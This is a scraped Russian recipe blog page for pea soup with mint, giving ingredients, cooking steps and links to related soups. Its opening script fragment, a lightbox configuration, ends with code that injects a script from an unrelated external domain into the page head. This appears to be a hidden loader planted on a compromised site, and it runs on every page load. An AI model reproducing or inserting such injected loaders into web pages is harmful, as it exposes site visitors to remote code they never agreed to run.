, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Суп из свежего гороха


fin_gorohsupГороховый супы не самые изысканные и любимые в народе, но этот рецепт мне показался очень даже неплохим! Во-первых, он из свежего гороха (ну не совсем свежего а мороженного). Ну если у вас вдруг есть совсем свежий, то просто чудесно-расчудесно!  Готовить его тоже недолго, и выглядит он свеженько так) по-весеннему) Итак:

Чего и сколько берем:

1. Мороженный горох — 400 граммов

2. Морковь — 1 штука

3. Лук репчатый одна штука

4. Мятка свежая — 3/4 веточки

Начинаем готовить:

1. Пассеруем морковь и лук на масле ГХИ

2. Закипячиваем литр воды

3. В кипящую воду кладем горошек и лук с морковью

4. Варим минут 5

5. Солим и перчим по вкусу

6. Миксером измельчаем прямо в кастрюле, предварительно добавив листья мяты

 

 

На эту тему вы можете почитать:

Супчик картофельный со специями
Борщ "Новый взгляд"
Фасолевый суп


Добавить комментарий